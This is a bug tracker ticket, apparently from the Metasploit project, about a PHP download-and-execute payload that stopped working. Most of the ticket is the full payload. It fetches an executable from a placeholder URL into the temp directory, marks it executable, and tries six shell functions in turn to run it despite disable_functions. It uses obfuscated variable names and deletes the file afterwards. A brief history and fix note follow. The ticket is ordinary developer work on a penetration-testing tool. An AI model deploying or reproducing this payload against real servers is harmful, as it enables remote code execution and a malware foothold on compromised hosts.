Bug #2495
PHP/Download_Exec payload stopped working after one of the later updates
| Status: | Closed | Start date: | 09/04/2010 | |
|---|---|---|---|---|
| Priority: | Normal | Due date: | ||
| Assignee: | - | % Done: | 100% |
|
| Category: | - | |||
| Target version: | - | |||
| Resolution: | Release Note: |
Description
<?php
if (!function_exists('sys_get_temp_dir')) {
function sys_get_temp_dir() {
if (!empty($_ENV['TMP'])) { return realpath($_ENV['TMP']); }
if (!empty($_ENV['TMPDIR'])) { return realpath($_ENV['TMPDIR']); }
if (!empty($_ENV['TEMP'])) { return realpath($_ENV['TEMP']); }
$tempfile=tempnam(uniqid(rand(),TRUE),'');
if (file_exists($tempfile)) {
@unlink($tempfile);
return realpath(dirname($tempfile));
}
return null;
}
}
$fname = sys_get_temp_dir() . DIRECTORY_SEPARATOR . "Zmku.exe";
$fd_in = fopen("<downloadurl>", "rb");
$fd_out = fopen($fname, "wb");
while (!feof($fd_in)) {
fwrite($fd_out, fread($fd_in, 8192));
}
fclose($fd_in);
fclose($fd_out);
chmod($fname, 0777);
$c = $fname;
@set_time_limit(0); @ignore_user_abort(1); @ini_set('max_execution_time',0);
$GNNjfQ=@ini_get('disable_functions');
if(!empty($GNNjfQ)){
$GNNjfQ=preg_replace('/[, ]+/', ',', $GNNjfQ);
$GNNjfQ=explode(',', $GNNjfQ);
$GNNjfQ=array_map('trim', $GNNjfQ);
}else{
$GNNjfQ=array();
}
#if (!(strtolower(PHP_OS) =~ 'win')) { #
# $c=$c." 2>&1\n"; # This is the code that leads to the error, tested with
#} # windows/meterpreter/reverse_tcp_dns payload available as exe file via http
$RlMiB='is_callable';
$GYuz='in_array';
if($RlMiB('proc_open')and!$GYuz('proc_open',$GNNjfQ)){
$handle=proc_open($c,array(array(pipe,'r'),array(pipe,'w'),array(pipe,'w')),$pipes);
$uDyyg=NULL;
while(!feof($pipes[1])){
$uDyyg.=fread($pipes[1],1024);
}
@proc_close($handle);
}else
if($RlMiB('exec')and!$GYuz('exec',$GNNjfQ)){
$uDyyg=array();
exec($c,$uDyyg);
$uDyyg=join(chr(10),$uDyyg).chr(10);
}else
if($RlMiB('popen')and!$GYuz('popen',$GNNjfQ)){
$fp=popen($c,'r');
$uDyyg=NULL;
if(is_resource($fp)){
while(!feof($fp)){
$uDyyg.=fread($fp,1024);
}
}
@pclose($fp);
}else
if($RlMiB('system')and!$GYuz('system',$GNNjfQ)){
ob_start();
system($c);
$uDyyg=ob_get_contents();
ob_end_clean();
}else
if($RlMiB('passthru')and!$GYuz('passthru',$GNNjfQ)){
ob_start();
passthru($c);
$uDyyg=ob_get_contents();
ob_end_clean();
}else
if($RlMiB('shell_exec')and!$GYuz('shell_exec',$GNNjfQ)){
$uDyyg=shell_exec($c);
}else
{
$uDyyg=0;
}
@unlink($fname);
?>
Associated revisions
ugh, i'm bouncing between too many languages, this syntax doesn't even work in php. fixes #2495
git-svn-id: file:///home/svn/framework3/trunk@10240 4d416f70-5f16-0410-b530-b9f4589650da
History
Updated by Oliver Kleinecke over 1 year ago
sry, code-highliting made it unreadable -.-
The erroneous code is in line 36 and following :
#if (!(strtolower(PHP_OS) =~ 'win')) { #
#$c=$c." 2>&1\n"; # This is the code that leads to the error, tested with
#} # windows/meterpreter/reverse_tcp_dns payload available as exe file via http
$RlMiB='is_callable';
$GYuz='in_array';
Updated by James Lee over 1 year ago
- Status changed from New to Resolved
- % Done changed from 0 to 100
Applied in changeset r10240.
Updated by James Lee over 1 year ago
- Status changed from Resolved to Closed